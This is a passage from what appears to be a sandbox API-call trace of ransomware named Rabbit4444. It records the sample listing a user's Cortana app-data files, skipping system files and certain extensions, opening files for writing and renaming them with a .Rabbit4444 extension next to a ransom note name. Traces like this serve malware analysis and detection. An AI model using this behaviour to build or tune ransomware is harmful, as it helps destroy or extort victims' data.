lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.139] lstrcmpiW (lpString1="AppIconCache", lpString2="Rabbit4444.exe") returned -1 [0067.139] lstrcmpiW (lpString1="AppIconCache", lpString2=".") returned 1 [0067.139] lstrcmpiW (lpString1="AppIconCache", lpString2="..") returned 1 [0067.139] lstrcmpiW (lpString1="AppIconCache", lpString2="windows") returned -1 [0067.139] lstrcmpiW (lpString1="AppIconCache", lpString2="bootmgr") returned -1 [0067.139] lstrcmpiW (lpString1="AppIconCache", lpString2="pagefile.sys") returned -1 [0067.139] lstrcmpiW (lpString1="AppIconCache", lpString2="boot") returned -1 [0067.139] lstrcmpiW (lpString1="AppIconCache", lpString2="ids.txt") returned -1 [0067.139] lstrcmpiW (lpString1="AppIconCache", lpString2="NTUSER.DAT") returned -1 [0067.139] lstrcpyW (in: lpString1=0x130ebec, lpString2="AppIconCache" | out: lpString1="AppIconCache") returned="AppIconCache" [0067.139] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122280 [0067.139] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xce) returned 0x108688 [0067.139] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122288 | out: ListHead=0xf68b0, ListEntry=0x122288) returned 0x122028 [0067.139] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2412562, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x3bf615b5, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0x3bf615b5, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ConstraintIndex", cAlternateFileName="CONSTR~1")) returned 1 [0067.139] lstrcmpiW (lpString1="ConstraintIndex", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.139] lstrcmpiW (lpString1="ConstraintIndex", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.139] lstrcmpiW (lpString1="ConstraintIndex", lpString2="Rabbit4444.exe") returned -1 [0067.140] lstrcmpiW (lpString1="ConstraintIndex", lpString2=".") returned 1 [0067.140] lstrcmpiW (lpString1="ConstraintIndex", lpString2="..") returned 1 [0067.140] lstrcmpiW (lpString1="ConstraintIndex", lpString2="windows") returned -1 [0067.140] lstrcmpiW (lpString1="ConstraintIndex", lpString2="bootmgr") returned 1 [0067.140] lstrcmpiW (lpString1="ConstraintIndex", lpString2="pagefile.sys") returned -1 [0067.140] lstrcmpiW (lpString1="ConstraintIndex", lpString2="boot") returned 1 [0067.140] lstrcmpiW (lpString1="ConstraintIndex", lpString2="ids.txt") returned -1 [0067.140] lstrcmpiW (lpString1="ConstraintIndex", lpString2="NTUSER.DAT") returned -1 [0067.140] lstrcpyW (in: lpString1=0x130ebec, lpString2="ConstraintIndex" | out: lpString1="ConstraintIndex") returned="ConstraintIndex" [0067.140] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220a0 [0067.140] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd4) returned 0x11b508 [0067.140] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1220a8 | out: ListHead=0xf68b0, ListEntry=0x1220a8) returned 0x122288 [0067.140] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc42f8885, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x520331de, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0x520331de, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DeviceSearchCache", cAlternateFileName="DEVICE~1")) returned 1 [0067.140] lstrcmpiW (lpString1="DeviceSearchCache", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.140] lstrcmpiW (lpString1="DeviceSearchCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.140] lstrcmpiW (lpString1="DeviceSearchCache", lpString2="Rabbit4444.exe") returned -1 [0067.140] lstrcmpiW (lpString1="DeviceSearchCache", lpString2=".") returned 1 [0067.140] lstrcmpiW (lpString1="DeviceSearchCache", lpString2="..") returned 1 [0067.140] lstrcmpiW (lpString1="DeviceSearchCache", lpString2="windows") returned -1 [0067.140] lstrcmpiW (lpString1="DeviceSearchCache", lpString2="bootmgr") returned 1 [0067.140] lstrcmpiW (lpString1="DeviceSearchCache", lpString2="pagefile.sys") returned -1 [0067.140] lstrcmpiW (lpString1="DeviceSearchCache", lpString2="boot") returned 1 [0067.140] lstrcmpiW (lpString1="DeviceSearchCache", lpString2="ids.txt") returned -1 [0067.140] lstrcmpiW (lpString1="DeviceSearchCache", lpString2="NTUSER.DAT") returned -1 [0067.140] lstrcpyW (in: lpString1=0x130ebec, lpString2="DeviceSearchCache" | out: lpString1="DeviceSearchCache") returned="DeviceSearchCache" [0067.140] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0067.140] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd8) returned 0x11c308 [0067.140] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x1220a8 [0067.140] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1edc172b, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x1edc172b, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x1edc172b, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Flighting", cAlternateFileName="FLIGHT~1")) returned 1 [0067.140] lstrcmpiW (lpString1="Flighting", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.140] lstrcmpiW (lpString1="Flighting", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.140] lstrcmpiW (lpString1="Flighting", lpString2="Rabbit4444.exe") returned -1 [0067.140] lstrcmpiW (lpString1="Flighting", lpString2=".") returned 1 [0067.140] lstrcmpiW (lpString1="Flighting", lpString2="..") returned 1 [0067.141] lstrcmpiW (lpString1="Flighting", lpString2="windows") returned -1 [0067.141] lstrcmpiW (lpString1="Flighting", lpString2="bootmgr") returned 1 [0067.141] lstrcmpiW (lpString1="Flighting", lpString2="pagefile.sys") returned -1 [0067.141] lstrcmpiW (lpString1="Flighting", lpString2="boot") returned 1 [0067.141] lstrcmpiW (lpString1="Flighting", lpString2="ids.txt") returned -1 [0067.141] lstrcmpiW (lpString1="Flighting", lpString2="NTUSER.DAT") returned -1 [0067.141] lstrcpyW (in: lpString1=0x130ebec, lpString2="Flighting" | out: lpString1="Flighting") returned="Flighting" [0067.141] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222a0 [0067.141] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc8) returned 0x116520 [0067.141] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222a8 | out: ListHead=0xf68b0, ListEntry=0x1222a8) returned 0x1222c8 [0067.141] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefe43626, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x81e596b0, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x81e596b0, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="speech_onecorereg.bin", cAlternateFileName="SPEECH~1.BIN")) returned 1 [0067.141] lstrcmpiW (lpString1="speech_onecorereg.bin", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0067.141] lstrcmpiW (lpString1="speech_onecorereg.bin", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.141] lstrcmpiW (lpString1="speech_onecorereg.bin", lpString2="Rabbit4444.exe") returned 1 [0067.141] lstrcmpiW (lpString1="speech_onecorereg.bin", lpString2=".") returned 1 [0067.141] lstrcmpiW (lpString1="speech_onecorereg.bin", lpString2="..") returned 1 [0067.141] lstrcmpiW (lpString1="speech_onecorereg.bin", lpString2="windows") returned -1 [0067.141] lstrcmpiW (lpString1="speech_onecorereg.bin", lpString2="bootmgr") returned 1 [0067.141] lstrcmpiW (lpString1="speech_onecorereg.bin", lpString2="pagefile.sys") returned 1 [0067.141] lstrcmpiW (lpString1="speech_onecorereg.bin", lpString2="boot") returned 1 [0067.141] lstrcmpiW (lpString1="speech_onecorereg.bin", lpString2="ids.txt") returned 1 [0067.141] lstrcmpiW (lpString1="speech_onecorereg.bin", lpString2="NTUSER.DAT") returned 1 [0067.141] lstrcpyW (in: lpString1=0x130ebec, lpString2="speech_onecorereg.bin" | out: lpString1="speech_onecorereg.bin") returned="speech_onecorereg.bin" [0067.141] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\speech_onecorereg.bin", dwFileAttributes=0x0) returned 1 [0067.142] lstrlenW (lpString="speech_onecorereg.bin") returned 21 [0067.142] lstrlenW (lpString="Rabbit4444") returned 10 [0067.142] lstrcmpiW (lpString1="orereg.bin", lpString2="Rabbit4444") returned -1 [0067.142] lstrlenW (lpString=".dll") returned 4 [0067.142] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0067.142] lstrlenW (lpString=".lnk") returned 4 [0067.142] lstrcmpiW (lpString1=".bin", lpString2=".lnk") returned -1 [0067.142] lstrlenW (lpString=".ini") returned 4 [0067.142] lstrcmpiW (lpString1=".bin", lpString2=".ini") returned -1 [0067.142] lstrlenW (lpString=".sys") returned 4 [0067.142] lstrcmpiW (lpString1=".bin", lpString2=".sys") returned -1 [0067.142] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\speech_onecorereg.bin" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\speech_onecorereg.bin"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0067.142] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.142] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15845312215) returned 1 [0067.142] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0067.143] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0067.143] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0067.143] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x260 [0067.144] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0067.145] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.145] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0067.146] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.146] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0067.146] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.146] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0067.146] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.146] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0067.146] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15845673592) returned 1 [0067.146] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0067.146] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0067.146] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.146] CloseHandle (hObject=0x260) returned 1 [0067.146] CloseHandle (hObject=0x27c) returned 1 [0067.146] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\speech_onecorereg.bin.Rabbit4444") returned 122 [0067.146] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\speech_onecorereg.bin" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\speech_onecorereg.bin"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\speech_onecorereg.bin.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\speech_onecorereg.bin.rabbit4444"), dwFlags=0x1) returned 1 [0067.147] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xefe43626, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xefe43626, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xefe43626, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="speech_onecorereg.bin.LOG1", cAlternateFileName="SPEECH~1.LOG")) returned 1 [0067.147] lstrcmpiW (lpString1="speech_onecorereg.bin.LOG1", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0067.147] lstrcmpiW (lpString1="speech_onecorereg.bin.LOG1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.147] lstrcmpiW (lpString1="speech_onecorereg.bin.LOG1", lpString2="Rabbit4444.exe") returned 1 [0067.147] lstrcmpiW (lpString1="speech_onecorereg.bin.LOG1", lpString2=".") returned 1 [0067.147] lstrcmpiW (lpString1="speech_onecorereg.bin.LOG1", lpString2="..") returned 1 [0067.147] lstrcmpiW (lpString1="speech_onecorereg.bin.LOG1", lpString2="windows") returned -1 [0067.147] lstrcmpiW (lpString1="speech_onecorereg.bin.LOG1", lpString2="bootmgr") returned 1 [0067.147] lstrcmpiW (lpString1="speech_onecorereg.bin.LOG1", lpString2="pagefile.sys") returned 1 [0067.148] lstrcmpiW (lpString1="speech_onecorereg.bin.LOG1", lpString2="boot") returned 1 [0067.148] lstrcmpiW (lpString1="speech_onecorereg.bin.LOG1", lpString2="ids.txt") returned 1 [0067.148] lstrcmpiW (lpString1="speech_onecorereg.bin.LOG1", lpString2="NTUSER.DAT") returned 1 [0067.148] lstrcpyW (in: lpString1=0x130ebec, lpString2="speech_onecorereg.bin.LOG1" | out: lpString1="speech_onecorereg.bin.LOG1") returned="speech_onecorereg.bin.LOG1" [0067.148] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\speech_onecorereg.bin.LOG1", dwFileAttributes=0x22) returned 1 [0067.148] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\speech_onecorereg.bin.LOG1", dwFileAttributes=0x6) returned 1 [0067.148] lstrlenW (lpString="speech_onecorereg.bin.LOG1") returned 26 [0067.148] lstrlenW (lpString="Rabbit4444") returned 10 [0067.148] lstrcmpiW (lpString1="g.bin.LOG1", lpString2="Rabbit4444") returned -1 [0067.148] lstrlenW (lpString=".dll") returned 4 [0067.148] lstrcmpiW (lpString1="LOG1", lpString2=".dll") returned 1 [0067.148] lstrlenW (lpString=".lnk") returned 4 [0067.148] lstrcmpiW (lpString1="LOG1", lpString2=".lnk") returned 1 [0067.148] lstrlenW (lpString=".ini") returned 4 [0067.148] lstrcmpiW (lpString1="LOG1", lpString2=".ini") returned 1 [0067.148] lstrlenW (lpString=".sys") returned 4 [0067.148] lstrcmpiW (lpString1="LOG1", lpString2=".sys") returned 1 [0067.148] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\speech_onecorereg.bin.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\speech_onecorereg.bin.log1"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0067.149] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.149] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15845950561) returned 1 [0067.149] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0067.149] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0067.149] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0067.149] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x260 [0067.150] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0067.154] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.154] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0067.154] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.154] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0067.154] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.154] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0067.154] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.154] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0067.154] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15846525354) returned 1 [0067.155] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0067.155] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0067.155] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.155] CloseHandle (hObject=0x260) returned 1 [0067.155] CloseHandle (hObject=0x27c) returned 1 [0067.155] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\speech_onecorereg.bin.LOG1.Rabbit4444") returned 127 [0067.155] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\speech_onecorereg.bin.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\speech_onecorereg.bin.log1"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\speech_onecorereg.bin.LOG1.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\speech_onecorereg.bin.log1.rabbit4444"), dwFlags=0x1) returned 1 [0067.156] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xefeb5d90, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xefeb5d90, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xefeb5d90, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="speech_onecorereg.bin.LOG2", cAlternateFileName="SPEECH~2.LOG")) returned 1 [0067.156] lstrcmpiW (lpString1="speech_onecorereg.bin.LOG2", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0067.156] lstrcmpiW (lpString1="speech_onecorereg.bin.LOG2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.156] lstrcmpiW (lpString1="speech_onecorereg.bin.LOG2", lpString2="Rabbit4444.exe") returned 1 [0067.156] lstrcmpiW (lpString1="speech_onecorereg.bin.LOG2", lpString2=".") returned 1 [0067.156] lstrcmpiW (lpString1="speech_onecorereg.bin.LOG2", lpString2="..") returned 1 [0067.156] lstrcmpiW (lpString1="speech_onecorereg.bin.LOG2", lpString2="windows") returned -1 [0067.156] lstrcmpiW (lpString1="speech_onecorereg.bin.LOG2", lpString2="bootmgr") returned 1 [0067.156] lstrcmpiW (lpString1="speech_onecorereg.bin.LOG2", lpString2="pagefile.sys") returned 1 [0067.156] lstrcmpiW (lpString1="speech_onecorereg.bin.LOG2", lpString2="boot") returned 1 [0067.156] lstrcmpiW (lpString1="speech_onecorereg.bin.LOG2", lpString2="ids.txt") returned 1 [0067.156] lstrcmpiW (lpString1="speech_onecorereg.bin.LOG2", lpString2="NTUSER.DAT") returned 1 [0067.156] lstrcpyW (in: lpString1=0x130ebec, lpString2="speech_onecorereg.bin.LOG2" | out: lpString1="speech_onecorereg.bin.LOG2") returned="speech_onecorereg.bin.LOG2" [0067.156] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\speech_onecorereg.bin.LOG2", dwFileAttributes=0x22) returned 1 [0067.156] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\speech_onecorereg.bin.LOG2", dwFileAttributes=0x6) returned 1 [0067.156] lstrlenW (lpString="speech_onecorereg.bin.LOG2") returned 26 [0067.156] lstrlenW (lpString="Rabbit4444") returned 10 [0067.157] lstrcmpiW (lpString1="g.bin.LOG2", lpString2="Rabbit4444") returned -1 [0067.157] lstrlenW (lpString=".dll") returned 4 [0067.157] lstrcmpiW (lpString1="LOG2", lpString2=".dll") returned 1 [0067.157] lstrlenW (lpString=".lnk") returned 4 [0067.157] lstrcmpiW (lpString1="LOG2", lpString2=".lnk") returned 1 [0067.157] lstrlenW (lpString=".ini") returned 4 [0067.157] lstrcmpiW (lpString1="LOG2", lpString2=".ini") returned 1 [0067.157] lstrlenW (lpString=".sys") returned 4 [0067.157] lstrcmpiW (lpString1="LOG2", lpString2=".sys") returned 1 [0067.157] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\speech_onecorereg.bin.LOG2" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\speech_onecorereg.bin.log2"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0067.157] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.157] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15846788315) returned 1 [0067.157] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0067.157] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0067.157] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0067.157] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x260 [0067.158] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0067.159] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.159] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0067.159] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.159] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0067.160] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.160] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0067.160] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.160] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0067.160] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15847066639) returned 1 [0067.160] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0067.160] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0067.160] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.160] CloseHandle (hObject=0x260) returned 1 [0067.160] CloseHandle (hObject=0x27c) returned 1 [0067.160] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\speech_onecorereg.bin.LOG2.Rabbit4444") returned 127 [0067.160] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\speech_onecorereg.bin.LOG2" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\speech_onecorereg.bin.log2"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\speech_onecorereg.bin.LOG2.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\speech_onecorereg.bin.log2.rabbit4444"), dwFlags=0x1) returned 1 [0067.161] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xefeb5d90, ftCreationTime.dwHighDateTime=0x1d32714, 